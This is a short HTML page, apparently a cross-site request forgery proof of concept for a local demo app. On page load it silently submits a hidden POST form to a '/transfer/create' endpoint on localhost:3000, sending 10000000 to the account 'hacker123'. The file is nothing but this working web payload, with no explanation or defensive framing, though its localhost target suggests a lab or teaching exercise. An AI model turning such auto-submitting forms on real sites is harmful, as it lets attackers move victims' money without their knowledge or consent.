<!doctype html>
<html>
    <head>
        <title></title>
    </head>
    <body onload="document.transferForm.submit()">
        <form 
            name ="transferForm"
            method="POST" 
            action="http://localhost:3000/transfer/create">
            <input type="text" name="accountId" value="hacker123">
            <input type="number" name="amount" value="10000000">
        </form>
    </body>
</html>